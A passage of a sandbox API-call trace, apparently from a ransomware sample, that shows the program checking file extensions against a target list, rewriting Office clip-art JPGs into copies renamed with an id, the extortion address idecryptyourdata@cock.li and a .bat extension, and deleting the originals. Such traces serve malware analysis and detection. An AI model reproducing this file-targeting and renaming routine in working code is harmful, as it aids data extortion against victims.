lpString2="WMF") returned -1 [0185.384] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107748.WMF") returned 68 [0185.384] lstrlenW (lpString=".dbf") returned 4 [0185.384] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0185.384] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107748.WMF") returned 68 [0185.384] lstrlenW (lpString=".1cd") returned 4 [0185.384] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0185.384] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107748.WMF") returned 68 [0185.384] lstrlenW (lpString=".jpg") returned 4 [0185.384] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0185.384] lstrcmpiW (lpString1=".JPG", lpString2=".bat") returned 1 [0185.384] lstrlenW (lpString="J0145669.JPG") returned 12 [0185.384] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145669.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0145669.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0185.385] GetFileSizeEx (in: hFile=0x388, lpFileSize=0x2fdff14 | out: lpFileSize=0x2fdff14*=31850) returned 1 [0185.385] CloseHandle (hObject=0x388) returned 1 [0185.385] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145669.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0145669.jpg")) returned 0x220 [0185.385] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145669.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0145669.jpg.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0185.385] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145669.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0145669.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0185.385] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0185.385] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0185.385] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145669.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0145669.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x360 [0185.386] GetLastError () returned 0x0 [0185.386] ReadFile (in: hFile=0x388, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x7c6a, lpOverlapped=0x0) returned 1 [0188.083] WriteFile (in: hFile=0x360, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0x7c70, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0x7c70, lpOverlapped=0x0) returned 1 [0188.084] ReadFile (in: hFile=0x388, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x0, lpOverlapped=0x0) returned 1 [0188.084] WriteFile (in: hFile=0x360, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0xec, lpOverlapped=0x0) returned 1 [0188.084] SetEndOfFile (hFile=0x360) returned 1 [0188.084] CloseHandle (hObject=0x360) returned 1 [0188.085] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0188.085] SetEndOfFile (hFile=0x388) returned 1 [0188.086] CloseHandle (hObject=0x388) returned 1 [0188.086] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145669.JPG.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0188.086] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145669.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0145669.jpg")) returned 1 [0188.086] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145669.JPG") returned 68 [0188.086] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145669.JPG") returned 68 [0188.086] lstrlenW (lpString=".doc") returned 4 [0188.086] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1 [0188.086] lstrlenW (lpString=".docx") returned 5 [0188.086] lstrcmpiW (lpString1=".docx", lpString2="9.JPG") returned -1 [0188.086] lstrlenW (lpString=".pdf") returned 4 [0188.086] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1 [0188.086] lstrlenW (lpString=".xls") returned 4 [0188.086] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1 [0188.086] lstrlenW (lpString=".xlsx") returned 5 [0188.086] lstrcmpiW (lpString1=".xlsx", lpString2="9.JPG") returned -1 [0188.086] lstrlenW (lpString=".ppt") returned 4 [0188.086] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1 [0188.086] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145669.JPG") returned 68 [0188.086] lstrlenW (lpString=".zip") returned 4 [0188.087] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0188.087] lstrlenW (lpString=".rar") returned 4 [0188.087] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0188.087] lstrlenW (lpString=".bz2") returned 4 [0188.087] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1 [0188.087] lstrlenW (lpString=".7z") returned 3 [0188.087] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1 [0188.087] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145669.JPG") returned 68 [0188.087] lstrlenW (lpString=".dbf") returned 4 [0188.087] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0188.087] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145669.JPG") returned 68 [0188.087] lstrlenW (lpString=".1cd") returned 4 [0188.087] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1 [0188.087] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145669.JPG") returned 68 [0188.087] lstrlenW (lpString=".jpg") returned 4 [0188.087] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0 [0188.087] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145669.JPG") returned 68 [0188.087] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145669.JPG") returned 68 [0188.087] lstrlenW (lpString=".doc") returned 4 [0188.087] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1 [0188.087] lstrlenW (lpString=".docx") returned 5 [0188.087] lstrcmpiW (lpString1=".docx", lpString2="9.JPG") returned -1 [0188.087] lstrlenW (lpString=".pdf") returned 4 [0188.087] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1 [0188.087] lstrlenW (lpString=".xls") returned 4 [0188.087] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1 [0188.087] lstrlenW (lpString=".xlsx") returned 5 [0188.087] lstrcmpiW (lpString1=".xlsx", lpString2="9.JPG") returned -1 [0188.087] lstrlenW (lpString=".ppt") returned 4 [0188.087] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1 [0188.087] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145669.JPG") returned 68 [0188.087] lstrlenW (lpString=".zip") returned 4 [0188.087] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0188.087] lstrlenW (lpString=".rar") returned 4 [0188.087] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0188.087] lstrlenW (lpString=".bz2") returned 4 [0188.087] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1 [0188.088] lstrlenW (lpString=".7z") returned 3 [0188.088] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1 [0188.088] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145669.JPG") returned 68 [0188.088] lstrlenW (lpString=".dbf") returned 4 [0188.088] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0188.088] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145669.JPG") returned 68 [0188.088] lstrlenW (lpString=".1cd") returned 4 [0188.088] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1 [0188.088] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145669.JPG") returned 68 [0188.088] lstrlenW (lpString=".jpg") returned 4 [0188.088] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0 [0188.088] lstrcmpiW (lpString1=".JPG", lpString2=".bat") returned 1 [0188.088] lstrlenW (lpString="J0145895.JPG") returned 12 [0188.088] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145895.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0145895.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0188.089] GetFileSizeEx (in: hFile=0x388, lpFileSize=0x2fdff14 | out: lpFileSize=0x2fdff14*=33958) returned 1 [0188.089] CloseHandle (hObject=0x388) returned 1 [0188.089] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145895.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0145895.jpg")) returned 0x220 [0188.089] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145895.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0145895.jpg.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0188.089] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145895.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0145895.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0188.089] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0188.089] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0188.089] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145895.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0145895.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x360 [0188.090] GetLastError () returned 0x0 [0188.090] ReadFile (in: hFile=0x388, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x84a6, lpOverlapped=0x0) returned 1 [0188.139] WriteFile (in: hFile=0x360, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0x84b0, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0x84b0, lpOverlapped=0x0) returned 1 [0188.142] ReadFile (in: hFile=0x388, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x0, lpOverlapped=0x0) returned 1 [0188.142] WriteFile (in: hFile=0x360, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0xec, lpOverlapped=0x0) returned 1 [0188.142] SetEndOfFile (hFile=0x360) returned 1 [0188.142] CloseHandle (hObject=0x360) returned 1 [0188.142] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0188.142] SetEndOfFile (hFile=0x388) returned 1 [0188.143] CloseHandle (hObject=0x388) returned 1 [0188.143] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145895.JPG.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0188.144] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145895.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0145895.jpg")) returned 1 [0188.144] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145895.JPG") returned 68 [0188.144] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145895.JPG") returned 68 [0188.144] lstrlenW (lpString=".doc") returned 4 [0188.144] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1 [0188.144] lstrlenW (lpString=".docx") returned 5 [0188.144] lstrcmpiW (lpString1=".docx", lpString2="5.JPG") returned -1 [0188.144] lstrlenW (lpString=".pdf") returned 4 [0188.144] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1 [0188.144] lstrlenW (lpString=".xls") returned 4 [0188.144] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1 [0188.144] lstrlenW (lpString=".xlsx") returned 5 [0188.144] lstrcmpiW (lpString1=".xlsx", lpString2="5.JPG") returned -1 [0188.144] lstrlenW (lpString=".ppt") returned 4 [0188.144] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1 [0188.144] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145895.JPG") returned 68 [0188.144] lstrlenW (lpString=".zip") returned 4 [0188.144] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0188.144] lstrlenW (lpString=".rar") returned 4 [0188.145] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0188.145] lstrlenW (lpString=".bz2") returned 4 [0188.145] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1 [0188.145] lstrlenW (lpString=".7z") returned 3 [0188.145] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1 [0188.145] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145895.JPG") returned 68 [0188.145] lstrlenW (lpString=".dbf") returned 4 [0188.145] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0188.145] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145895.JPG") returned 68 [0188.145] lstrlenW (lpString=".1cd") returned 4 [0188.145] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1 [0188.145] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145895.JPG") returned 68 [0188.145] lstrlenW (lpString=".jpg") returned 4 [0188.145] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0 [0188.145] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145895.JPG") returned 68 [0188.145] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145895.JPG") returned 68 [0188.145] lstrlenW (lpString=".doc") returned 4 [0188.145] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1 [0188.145] lstrlenW (lpString=".docx") returned 5 [0188.145] lstrcmpiW (lpString1=".docx", lpString2="5.JPG") returned -1 [0188.145] lstrlenW (lpString=".pdf") returned 4 [0188.145] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1 [0188.145] lstrlenW (lpString=".xls") returned 4 [0188.145] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1 [0188.145] lstrlenW (lpString=".xlsx") returned 5 [0188.145] lstrcmpiW (lpString1=".xlsx", lpString2="5.JPG") returned -1 [0188.146] lstrlenW (lpString=".ppt") returned 4 [0188.146] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1 [0188.146] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145895.JPG") returned 68 [0188.146] lstrlenW (lpString=".zip") returned 4 [0188.146] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0188.146] lstrlenW (lpString=".rar") returned 4 [0188.146] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0188.146] lstrlenW (lpString=".bz2") returned 4 [0188.146] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1 [0188.146] lstrlenW (lpString=".7z") returned 3 [0188.146] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1 [0188.146] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145895.JPG") returned 68 [0188.146] lstrlenW (lpString=".dbf") returned 4 [0188.146] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0188.146] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145895.JPG") returned 68 [0188.146] lstrlenW (lpString=".1cd") returned 4 [0188.146] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1 [0188.146] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145895.JPG") returned 68 [0188.146] lstrlenW (lpString=".jpg") returned 4 [0188.146] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0 [0188.146] lstrcmpiW (lpString1=".JPG", lpString2=".bat") returned 1 [0188.146] lstrlenW (lpString="J0148798.JPG") returned 12 [0188.146] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0148798.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0148798.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0188.147] GetFileSizeEx (in: hFile=0x388, lpFileSize=0x2fdff14 | out: lpFileSize=0x2fdff14*=38237) returned 1 [0188.147] CloseHandle (hObject=0x388) returned 1 [0188.147] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0148798.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0148798.jpg")) returned 0x220 [0188.147] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0148798.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0148798.jpg.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0188.147] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0148798.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0148798.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0188.147] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0188.148] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0188.148] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0148798.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0148798.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x360 [0188.148] GetLastError () returned 0x0 [0188.148] ReadFile (in: hFile=0x388, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x955d, lpOverlapped=0x0) returned 1 [0188.168] WriteFile (in: hFile=0x360, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0x9560, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0x9560, lpOverlapped=0x0) returned 1 [0188.170] ReadFile (in: hFile=0x388, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x0, lpOverlapped=0x0) returned 1 [0188.170] WriteFile (in: hFile=0x360, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0xec, lpOverlapped=0x0) returned 1 [0188.170] SetEndOfFile (hFile=0x360) returned 1 [0188.171] CloseHandle (hObject=0x360) returned 1 [0188.171] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0188.171] SetEndOfFile (hFile=0x388) returned 1 [0188.172] CloseHandle (hObject=0x388) returned 1 [0188.172] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0148798.JPG.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0188.172] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0148798.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0148798.jpg")) returned 1 [0188.173] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0148798.JPG") returned 68 [0188.173] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0148798.JPG") returned 68 [0188.173] lstrlenW (lpString=".doc") returned 4 [0188.173] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1 [0188.173] lstrlenW (lpString=".docx") returned 5 [0188.173] lstrcmpiW (lpString1=".docx", lpString2="8.JPG") returned -1 [0188.173] lstrlenW (lpString=".pdf") returned 4 [0188.173] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1 [0188.173] lstrlenW (lpString=".xls") returned 4 [0188.173] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1 [0188.173] lstrlenW (lpString=".xlsx") returned 5 [0188.173] lstrcmpiW (lpString1=".xlsx", lpString2="8.JPG") returned -1 [0188.173] lstrlenW (lpString=".ppt") returned 4 [0188.173] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1 [0188.173] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0148798.JPG") returned 68 [0188.173] lstrlenW (lpString=".zip") returned 4 [0188.173] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0188.173] lstrlenW (lpString=".rar") returned 4 [0188.173] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0188.173] lstrlenW (lpString=".bz2") returned 4 [0188.173] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1 [0188.173] lstrlenW (lpString=".7z") returned 3 [0188.173] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1 [0188.173] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0148798.JPG") returned 68 [0188.173] lstrlenW (lpString=".dbf") returned 4 [0188.173] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0188.173] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0148798.JPG") returned 68 [0188.173] lstrlenW (lpString=".1cd") returned 4 [0188.173] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1 [0188.174] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0148798.JPG") returned 68 [0188.174] lstrlenW (lpString=".jpg") returned 4 [0188.174] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0 [0188.174] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0148798.JPG") returned 68 [0188.174] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0148798.JPG") returned 68 [0188.174] lstrlenW (lpString=".doc") returned 4 [0188.174] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1 [0188.174] lstrlenW (lpString=".docx") returned 5 [0188.174] lstrcmpiW (lpString1=".docx", lpString2="8.JPG") returned -1 [0188.174] lstrlenW (lpString=".pdf") returned 4 [0188.174] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1 [0188.174] lstrlenW (lpString=".xls") returned 4 [0188.174] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1 [0188.174] lstrlenW (lpString=".xlsx") returned 5 [0188.174] lstrcmpiW (lpString1=".xlsx", lpString2="8.JPG") returned -1 [0188.174] lstrlenW (lpString=".ppt") returned 4 [0188.174] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1 [0188.174] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0148798.JPG") returned 68 [0188.174] lstrlenW (lpString=".zip") returned 4 [0188.174] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0188.174] lstrlenW (lpString=".rar") returned 4 [0188.174] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0188.174] lstrlenW (lpString=".bz2") returned 4 [0188.174] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1 [0188.174] lstrlenW (lpString=".7z") returned 3 [0188.174] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1 [0188.174] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0148798.JPG") returned 68 [0188.174] lstrlenW (lpString=".dbf") returned 4 [0188.174] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0188.174] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0148798.JPG") returned 68 [0188.175] lstrlenW (lpString=".1cd") returned 4 [0188.175] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1 